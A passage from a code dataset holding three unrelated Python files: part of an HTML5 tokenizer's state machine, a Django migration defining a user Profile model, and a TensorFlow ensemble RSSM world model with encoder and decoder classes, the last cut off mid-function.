elif data == '&':
self.processEntityInAttribute('"')
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][1] += '\uFFFD'
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-attribute-value-double-quote'})
self.state = self.dataState
else:
self.currentToken['data'][-1][1] += data +\
self.stream.charsUntil(("\"", '&', '\u0000'))
return True
def attributeValueSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterAttributeValueState
elif data == '&':
self.processEntityInAttribute("'")
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][1] += '\uFFFD'
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-attribute-value-single-quote'})
self.state = self.dataState
else:
self.currentToken['data'][-1][1] += data +\
self.stream.charsUntil(("'", '&', '\u0000'))
return True
def attributeValueUnQuotedState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == '&':
self.processEntityInAttribute('>')
elif data == '>':
self.emitCurrentToken()
elif data in ('"', "'", '=', '<', '`'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-character-in-unquoted-attribute-value'})
self.currentToken['data'][-1][1] += data
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][1] += '\uFFFD'
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-attribute-value-no-quotes'})
self.state = self.dataState
else:
self.currentToken['data'][-1][1] += data + self.stream.charsUntil(
frozenset(('&', '>', '"', "'", '=', '<', '`', '\u0000')) | spaceCharacters)
return True
def afterAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == '>':
self.emitCurrentToken()
elif data == '/':
self.state = self.selfClosingStartTagState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-EOF-after-attribute-value'})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-character-after-attribute-value'})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def selfClosingStartTagState(self):
data = self.stream.char()
if data == '>':
self.currentToken['selfClosing'] = True
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data':
'unexpected-EOF-after-solidus-in-tag'})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-character-after-solidus-in-tag'})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def bogusCommentState(self):
# Make a new comment token and give it as value all the characters
# until the first > or EOF (charsUntil checks for EOF automatically)
# and emit it.
data = self.stream.charsUntil('>')
data = data.replace('\u0000', '\uFFFD')
self.tokenQueue.append(
{'type': tokenTypes['Comment'], 'data': data})
# Eat the character directly after the bogus comment which is either a
# ">" or an EOF.
self.stream.char()
self.state = self.dataState
return True
def markupDeclarationOpenState(self):
charStack = [self.stream.char()]
if charStack[-1] == '-':
charStack.append(self.stream.char())
if charStack[-1] == '-':
self.currentToken = {'type': tokenTypes['Comment'], 'data': ''}
self.state = self.commentStartState
return True
elif charStack[-1] in ('d', 'D'):
matched = True
for expected in (('o', 'O'), ('c', 'C'), ('t', 'T'),
('y', 'Y'), ('p', 'P'), ('e', 'E')):
charStack.append(self.stream.char())
if charStack[-1] not in expected:
matched = False
break
if matched:
self.currentToken = {'type': tokenTypes['Doctype'],
'name': '',
'publicId': None, 'systemId': None,
'correct': True}
self.state = self.doctypeState
return True
elif (charStack[-1] == '[' and
self.parser is not None and
self.parser.tree.openElements and
self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace):
matched = True
for expected in ['C', 'D', 'A', 'T', 'A', '[']:
charStack.append(self.stream.char())
if charStack[-1] != expected:
matched = False
break
if matched:
self.state = self.cdataSectionState
return True
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-dashes-or-doctype'})
while charStack:
self.stream.unget(charStack.pop())
self.state = self.bogusCommentState
return True
def commentStartState(self):
data = self.stream.char()
if data == '-':
self.state = self.commentStartDashState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'incorrect-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += data
self.state = self.commentState
return True
def commentStartDashState(self):
data = self.stream.char()
if data == '-':
self.state = self.commentEndState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '-\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'incorrect-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += '-' + data
self.state = self.commentState
return True
def commentState(self):
data = self.stream.char()
if data == '-':
self.state = self.commentEndDashState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '\uFFFD'
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'eof-in-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += data + \
self.stream.charsUntil(('-', '\u0000'))
return True
def commentEndDashState(self):
data = self.stream.char()
if data == '-':
self.state = self.commentEndState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '-\uFFFD'
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment-end-dash'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += '-' + data
self.state = self.commentState
return True
def commentEndState(self):
data = self.stream.char()
if data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '--\uFFFD'
self.state = self.commentState
elif data == '!':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-bang-after-double-dash-in-comment'})
self.state = self.commentEndBangState
elif data == '-':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-dash-after-double-dash-in-comment'})
self.currentToken['data'] += data
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment-double-dash'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
# XXX
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-comment'})
self.currentToken['data'] += '--' + data
self.state = self.commentState
return True
def commentEndBangState(self):
data = self.stream.char()
if data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '-':
self.currentToken['data'] += '--!'
self.state = self.commentEndDashState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '--!\uFFFD'
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment-end-bang-state'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += '--!' + data
self.state = self.commentState
return True
def doctypeState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-doctype-name-but-got-eof'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'need-space-after-doctype'})
self.stream.unget(data)
self.state = self.beforeDoctypeNameState
return True
def beforeDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-doctype-name-but-got-right-bracket'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['name'] = '\uFFFD'
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-doctype-name-but-got-eof'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['name'] = data
self.state = self.doctypeNameState
return True
def doctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.currentToken['name'] = self.currentToken['name'].translate(asciiUpper2Lower)
self.state = self.afterDoctypeNameState
elif data == '>':
self.currentToken['name'] = self.currentToken['name'].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['name'] += '\uFFFD'
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype-name'})
self.currentToken['correct'] = False
self.currentToken['name'] = self.currentToken['name'].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['name'] += data
return True
def afterDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.currentToken['correct'] = False
self.stream.unget(data)
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
if data in ('p', 'P'):
matched = True
for expected in (('u', 'U'), ('b', 'B'), ('l', 'L'),
('i', 'I'), ('c', 'C')):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypePublicKeywordState
return True
elif data in ('s', 'S'):
matched = True
for expected in (('y', 'Y'), ('s', 'S'), ('t', 'T'),
('e', 'E'), ('m', 'M')):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypeSystemKeywordState
return True
# All the characters read before the current 'data' will be
# [a-zA-Z], so they're garbage in the bogus doctype and can be
# discarded; only the latest character might be '>' or EOF
# and needs to be ungetted
self.stream.unget(data)
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-space-or-right-bracket-in-doctype', 'datavars':
{'data': data}})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypePublicKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypePublicIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
return True
def beforeDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken['publicId'] = ''
self.state = self.doctypePublicIdentifierDoubleQuotedState
elif data == "'":
self.currentToken['publicId'] = ''
self.state = self.doctypePublicIdentifierSingleQuotedState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def doctypePublicIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypePublicIdentifierState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['publicId'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['publicId'] += data
return True
def doctypePublicIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypePublicIdentifierState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['publicId'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['publicId'] += data
return True
def afterDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.betweenDoctypePublicAndSystemIdentifiersState
elif data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def betweenDoctypePublicAndSystemIdentifiersState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypeSystemKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeSystemIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
return True
def beforeDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def doctypeSystemIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypeSystemIdentifierState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['systemId'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['systemId'] += data
return True
def doctypeSystemIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypeSystemIdentifierState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['systemId'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['systemId'] += data
return True
def afterDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.state = self.bogusDoctypeState
return True
def bogusDoctypeState(self):
data = self.stream.char()
if data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
# XXX EMIT
self.stream.unget(data)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
pass
return True
def cdataSectionState(self):
data = []
while True:
data.append(self.stream.charsUntil(']'))
data.append(self.stream.charsUntil('>'))
char = self.stream.char()
if char == EOF:
break
else:
assert char == '>'
if data[-1][-2:] == ']]':
data[-1] = data[-1][:-2]
break
else:
data.append(char)
data = ''.join(data)
# Deal with null here rather than in the parser
nullCount = data.count('\u0000')
if nullCount > 0:
for i in range(nullCount):
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
data = data.replace('\u0000', '\uFFFD')
if data:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': data})
self.state = self.dataState
return True
|
py | b414d1d29fce922af2c2cba6949ad8868d793f8e | # Generated by Django 3.0.8 on 2020-08-03 19:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('website', models.URLField(blank=True)),
('biography', models.TextField(blank=True)),
('phone_number', models.CharField(blank=True, max_length=20)),
('picture', models.ImageField(blank=True, null=True, upload_to='users/pictures')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | b414d1f0529b798e4d5b470feb7661651ce8d27d | import re
import numpy as np
import tensorflow as tf
from tensorflow.keras import layers as tfkl
from tensorflow_probability import distributions as tfd
from tensorflow.keras.mixed_precision import experimental as prec
import common
class EnsembleRSSM(common.Module):
def __init__(
self, ensemble=5, stoch=30, deter=200, hidden=200, discrete=False,
act='elu', norm='none', std_act='softplus', min_std=0.1):
super().__init__()
self._ensemble = ensemble
self._stoch = stoch
self._deter = deter
self._hidden = hidden
self._discrete = discrete
self._act = get_act(act)
self._norm = norm
self._std_act = std_act
self._min_std = min_std
self._cell = GRUCell(self._deter, norm=True)
self._cast = lambda x: tf.cast(x, prec.global_policy().compute_dtype)
def initial(self, batch_size):
dtype = prec.global_policy().compute_dtype
if self._discrete:
state = dict(
logit=tf.zeros([batch_size, self._stoch, self._discrete], dtype),
stoch=tf.zeros([batch_size, self._stoch, self._discrete], dtype),
deter=self._cell.get_initial_state(None, batch_size, dtype))
else:
state = dict(
mean=tf.zeros([batch_size, self._stoch], dtype),
std=tf.zeros([batch_size, self._stoch], dtype),
stoch=tf.zeros([batch_size, self._stoch], dtype),
deter=self._cell.get_initial_state(None, batch_size, dtype))
return state
@tf.function
def observe(self, embed, action, is_first, state=None):
swap = lambda x: tf.transpose(x, [1, 0] + list(range(2, len(x.shape))))
if state is None:
state = self.initial(tf.shape(action)[0])
post, prior = common.static_scan(
lambda prev, inputs: self.obs_step(prev[0], *inputs),
(swap(action), swap(embed), swap(is_first)), (state, state))
post = {k: swap(v) for k, v in post.items()}
prior = {k: swap(v) for k, v in prior.items()}
return post, prior
@tf.function
def imagine(self, action, state=None):
swap = lambda x: tf.transpose(x, [1, 0] + list(range(2, len(x.shape))))
if state is None:
state = self.initial(tf.shape(action)[0])
assert isinstance(state, dict), state
action = swap(action)
prior = common.static_scan(self.img_step, action, state)
prior = {k: swap(v) for k, v in prior.items()}
return prior
def get_feat(self, state):
stoch = self._cast(state['stoch'])
if self._discrete:
shape = stoch.shape[:-2] + [self._stoch * self._discrete]
stoch = tf.reshape(stoch, shape)
return tf.concat([stoch, state['deter']], -1)
def get_dist(self, state, ensemble=False):
if ensemble:
state = self._suff_stats_ensemble(state['deter'])
if self._discrete:
logit = state['logit']
logit = tf.cast(logit, tf.float32)
dist = tfd.Independent(common.OneHotDist(logit), 2)
else:
mean, std = state['mean'], state['std']
mean = tf.cast(mean, tf.float32)
std = tf.cast(std, tf.float32)
dist = tfd.MultivariateNormalDiag(mean, std)
return dist
@tf.function
def obs_step(self, prev_state, prev_action, embed, is_first, sample=True):
# if is_first.any():
prev_state, prev_action = tf.nest.map_structure(
lambda x: tf.einsum(
'b,b...->b...', 1.0 - is_first.astype(x.dtype), x),
(prev_state, prev_action))
prior = self.img_step(prev_state, prev_action, sample)
x = tf.concat([prior['deter'], embed], -1)
x = self.get('obs_out', tfkl.Dense, self._hidden)(x)
x = self.get('obs_out_norm', NormLayer, self._norm)(x)
x = self._act(x)
stats = self._suff_stats_layer('obs_dist', x)
dist = self.get_dist(stats)
stoch = dist.sample() if sample else dist.mode()
post = {'stoch': stoch, 'deter': prior['deter'], **stats}
return post, prior
@tf.function
def img_step(self, prev_state, prev_action, sample=True):
prev_stoch = self._cast(prev_state['stoch'])
prev_action = self._cast(prev_action)
if self._discrete:
shape = prev_stoch.shape[:-2] + [self._stoch * self._discrete]
prev_stoch = tf.reshape(prev_stoch, shape)
x = tf.concat([prev_stoch, prev_action], -1)
x = self.get('img_in', tfkl.Dense, self._hidden)(x)
x = self.get('img_in_norm', NormLayer, self._norm)(x)
x = self._act(x)
deter = prev_state['deter']
x, deter = self._cell(x, [deter])
deter = deter[0] # Keras wraps the state in a list.
stats = self._suff_stats_ensemble(x)
index = tf.random.uniform((), 0, self._ensemble, tf.int32)
stats = {k: v[index] for k, v in stats.items()}
dist = self.get_dist(stats)
stoch = dist.sample() if sample else dist.mode()
prior = {'stoch': stoch, 'deter': deter, **stats}
return prior
def _suff_stats_ensemble(self, inp):
bs = list(inp.shape[:-1])
inp = inp.reshape([-1, inp.shape[-1]])
stats = []
for k in range(self._ensemble):
x = self.get(f'img_out_{k}', tfkl.Dense, self._hidden)(inp)
x = self.get(f'img_out_norm_{k}', NormLayer, self._norm)(x)
x = self._act(x)
stats.append(self._suff_stats_layer(f'img_dist_{k}', x))
stats = {
k: tf.stack([x[k] for x in stats], 0)
for k, v in stats[0].items()}
stats = {
k: v.reshape([v.shape[0]] + bs + list(v.shape[2:]))
for k, v in stats.items()}
return stats
def _suff_stats_layer(self, name, x):
if self._discrete:
x = self.get(name, tfkl.Dense, self._stoch * self._discrete, None)(x)
logit = tf.reshape(x, x.shape[:-1] + [self._stoch, self._discrete])
return {'logit': logit}
else:
x = self.get(name, tfkl.Dense, 2 * self._stoch, None)(x)
mean, std = tf.split(x, 2, -1)
std = {
'softplus': lambda: tf.nn.softplus(std),
'sigmoid': lambda: tf.nn.sigmoid(std),
'sigmoid2': lambda: 2 * tf.nn.sigmoid(std / 2),
}[self._std_act]()
std = std + self._min_std
return {'mean': mean, 'std': std}
def kl_loss(self, post, prior, forward, balance, free, free_avg):
kld = tfd.kl_divergence
sg = lambda x: tf.nest.map_structure(tf.stop_gradient, x)
lhs, rhs = (prior, post) if forward else (post, prior)
mix = balance if forward else (1 - balance)
if balance == 0.5:
value = kld(self.get_dist(lhs), self.get_dist(rhs))
loss = tf.maximum(value, free).mean()
else:
value_lhs = value = kld(self.get_dist(lhs), self.get_dist(sg(rhs)))
value_rhs = kld(self.get_dist(sg(lhs)), self.get_dist(rhs))
if free_avg:
loss_lhs = tf.maximum(value_lhs.mean(), free)
loss_rhs = tf.maximum(value_rhs.mean(), free)
else:
loss_lhs = tf.maximum(value_lhs, free).mean()
loss_rhs = tf.maximum(value_rhs, free).mean()
loss = mix * loss_lhs + (1 - mix) * loss_rhs
return loss, value
class Encoder(common.Module):
def __init__(
self, shapes, cnn_keys=r'.*', mlp_keys=r'.*', act='elu', norm='none',
cnn_depth=48, cnn_kernels=(4, 4, 4, 4), mlp_layers=[400, 400, 400, 400]):
self.shapes = shapes
self.cnn_keys = [
k for k, v in shapes.items() if re.match(cnn_keys, k) and len(v) == 3]
self.mlp_keys = [
k for k, v in shapes.items() if re.match(mlp_keys, k) and len(v) == 1]
print('Encoder CNN inputs:', list(self.cnn_keys))
print('Encoder MLP inputs:', list(self.mlp_keys))
self._act = get_act(act)
self._norm = norm
self._cnn_depth = cnn_depth
self._cnn_kernels = cnn_kernels
self._mlp_layers = mlp_layers
@tf.function
def __call__(self, data):
key, shape = list(self.shapes.items())[0]
batch_dims = data[key].shape[:-len(shape)]
data = {
k: tf.reshape(v, (-1,) + tuple(v.shape)[len(batch_dims):])
for k, v in data.items()}
outputs = []
if self.cnn_keys:
outputs.append(self._cnn({k: data[k] for k in self.cnn_keys}))
if self.mlp_keys:
outputs.append(self._mlp({k: data[k] for k in self.mlp_keys}))
output = tf.concat(outputs, -1)
return output.reshape(batch_dims + output.shape[1:])
def _cnn(self, data):
x = tf.concat(list(data.values()), -1)
x = x.astype(prec.global_policy().compute_dtype)
for i, kernel in enumerate(self._cnn_kernels):
depth = 2 ** i * self._cnn_depth
x = self.get(f'conv{i}', tfkl.Conv2D, depth, kernel, 2)(x)
x = self.get(f'convnorm{i}', NormLayer, self._norm)(x)
x = self._act(x)
return x.reshape(tuple(x.shape[:-3]) + (-1,))
def _mlp(self, data):
x = tf.concat(list(data.values()), -1)
x = x.astype(prec.global_policy().compute_dtype)
for i, width in enumerate(self._mlp_layers):
x = self.get(f'dense{i}', tfkl.Dense, width)(x)
x = self.get(f'densenorm{i}', NormLayer, self._norm)(x)
x = self._act(x)
return x
class Decoder(common.Module):
def __init__(
self, shapes, cnn_keys=r'.*', mlp_keys=r'.*', act='elu', norm='none',
cnn_depth=48, cnn_kernels=(4, 4, 4, 4), mlp_layers=[400, 400, 400, 400]):
self._shapes = shapes
self.cnn_keys = [
k for k, v in shapes.items() if re.match(cnn_keys, k) and len(v) == 3]
self.mlp_keys = [
k for k, v in shapes.items() if re.match(mlp_keys, k) and len(v) == 1]
print('Decoder CNN outputs:', list(self.cnn_keys))
print('Decoder MLP outputs:', list(self.mlp_keys))
self._act = get_act(act)
self._norm = norm
self._cnn_depth = cnn_depth
self._cnn_kernels = cnn_kernels
self._mlp_layers = mlp_layers
def __call__(self, features):
features = tf.cast(features, prec.global_policy().compute_dtype)
outputs = {}
if self.cnn_keys:
outputs.update(self._cnn(features))
if self.mlp_keys:
outputs.update(self._mlp(features))
return outputs
def _cnn(self, features):
channels = {k: self._shapes[k][-1] for k in self.cnn_keys}
ConvT = tfkl.Conv2DTranspose
x = self.get('convin', tfkl.Dense, 32 * self._cnn_depth)(features)
x = tf.reshape(x, [-1, 1, 1, 32 * self._cnn_depth])
for i, kernel in enumerate(self._cnn_kernels):
